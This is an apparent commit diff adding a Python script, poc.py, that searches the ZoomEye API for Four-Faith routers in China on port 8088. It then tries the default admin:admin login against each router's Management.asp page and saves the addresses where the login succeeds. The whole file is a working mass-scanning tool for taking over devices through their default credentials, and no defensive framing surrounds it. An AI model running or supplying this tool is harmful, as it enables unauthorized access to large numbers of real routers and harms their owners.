1+ # @author:九世
2+ # @time:2019/5/25
3+ # @file:poc.py
4+
5+ from gevent import monkey ;monkey .patch_all ()
6+ import gevent
7+ import requests
8+ import sys
9+ from multiprocessing import Process
10+
11+ headers_s = { 'user-agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' }
12+ login_s = {'Authorization' : 'Basic YWRtaW46YWRtaW4=' }
13+
14+ class Run :
15+ def __init__ (self ,username ,password ):
16+ self .username = username
17+ self .password = password
18+
19+ def exploit (self ,url ):
20+ urls = 'http://{}:8088' .format (url )
21+ try :
22+ rvt = requests .get (url = urls ,headers = headers_s ,timeout = 3 )
23+ if rvt .status_code == 200 and rvt .text != '' :
24+ urls = '{}/Management.asp' .format (str (rvt .url ).rstrip ('/' ))
25+ rbt = requests .get (url = urls ,headers = login_s )
26+ if rbt .status_code == 200 :
27+ print ('[+] Find the default password url:{} username:admin password:admin' .format (rbt .url ))
28+ print ('url:{} username:admin password:admin' .format (rbt .url ),file = open ('save.txt' ,'a' ))
29+
30+ except :
31+ pass
32+
33+ def xc (self ,xt ):
34+ gv = []
35+ for x in xt :
36+ gv .append (gevent .spawn (self .exploit ,x ))
37+ print ('[+] Detection and survival' )
38+ gevent .joinall (gv )
39+ print ('[+] Survival URLs are stored in:{}/save.txt' .format (sys .argv [0 ]).replace ('/poc.py' ,'' ))
40+
41+
42+ def djc (self ,lt ):
43+ rg = []
44+ calc = 0
45+ shu = len (lt )
46+ for l in lt :
47+ if calc == shu :
48+ p = Process (target = self .xc ,args = (rg ,))
49+ p .start ()
50+ rg .clear ()
51+ calc = 0
52+ rg .append (l )
53+ calc += 1
54+
55+ if len (rg )> 0 :
56+ p = Process (target = self .xc , args = (rg ,))
57+ p .start ()
58+
59+ def zoomeye (self ):
60+ page = 11
61+ iplist = []
62+ url = 'https://api.zoomeye.org/user/login'
63+ data = {'username' :self .username ,'password' :self .password }
64+ rqt = requests .post (url = url ,json = data )
65+ if rqt .json ()['access_token' ]:
66+ print ('[+] Log in to zoomeye successfully' )
67+ access_token = rqt .json ()['access_token' ]
68+ print ('[+] access_token:{}' .format (access_token ))
69+ print ('[+] Get IP page:{}' .format (page ))
70+ for p in range (1 ,page ):
71+ url = 'https://api.zoomeye.org/host/search?query=app%3A"Four-Faith"%20%2Bcountry%3A"CN"%20%2Bport%3A8088%20ver%3A"v2.0.0"%20%2Bapp%3A"Four-Faith%20router%20httpd"&page={}' .format (p )
72+ headers = {'Authorization' :'JWT {}' .format (access_token )}
73+ rqt2 = requests .get (url = url ,headers = headers )
74+ matches = rqt2 .json ()['matches' ]
75+ for m in matches :
76+ iplist .append (m ['ip' ])
77+
78+ self .djc (iplist )
79+ else :
80+ print ('[-] Login zoomeye failed' )
81+ exit ()
82+
83+ if __name__ == '__main__' :
84+ username = 'zoomeye_username'
85+ password = 'zoomeye_password'
86+ obj = Run (username = username ,password = password )
87+ obj .zoomeye ()
0 commit comments